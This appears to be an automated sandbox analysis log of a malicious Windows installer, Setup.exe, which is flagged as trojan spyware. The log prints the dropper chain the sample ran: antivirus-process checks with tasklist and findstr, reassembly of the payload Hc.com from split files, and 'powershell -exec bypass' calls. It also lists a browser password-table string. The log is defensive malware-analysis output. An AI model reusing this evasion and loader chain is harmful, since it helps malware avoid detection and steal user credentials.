            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.169.205:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002DF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002DF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002F9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002D4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002CF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\EngagementRisks
            Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\LordGarmin
            Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\BarcelonaTranny
            Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\LabInterfaces
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_0040737E
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406EFE
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004079A2
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00288017
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0027E144
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0026E1F0
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0029A26E
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002822A2
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002622AD
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0027C624
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0029E87F
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002EC8A4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002D2A05
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00296ADE
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002C8BFF
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0027CD7A
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_0028CE10
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00297159
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00269240
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002F5311
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002696E0
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00281704
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00281A76
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00269B60
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00287B8B
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00281D20
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00287DBA
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_00281FE7
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\280366\Hc.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: String function: 0027FD52 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: String function: 00280DA0 appears 46 times
            Source: C:\Users\user\Desktop\Setup.exe | Code function: String function: 004062CF appears 58 times
            Source: Setup.exe | Static PE information: invalid certificate
            Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Process created: Commandline size = 4588
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Process created: Commandline size = 4588
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@30/31@4/3
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002D41FA GetLastError,FormatMessageW
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002C2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002C1A0B AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002CDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004024FB CoCreateInstance
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Code function: 11_2_002D3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
            Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Users\user\AppData\Local\Temp\nsm8CCA.tmp
            Source: Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Hc.com, 0000000B.00000003.2044421982.0000000004450000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044108770.000000000447F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\user\Desktop\Setup.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
            Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive 
information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive 
information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: dnsapi.dll
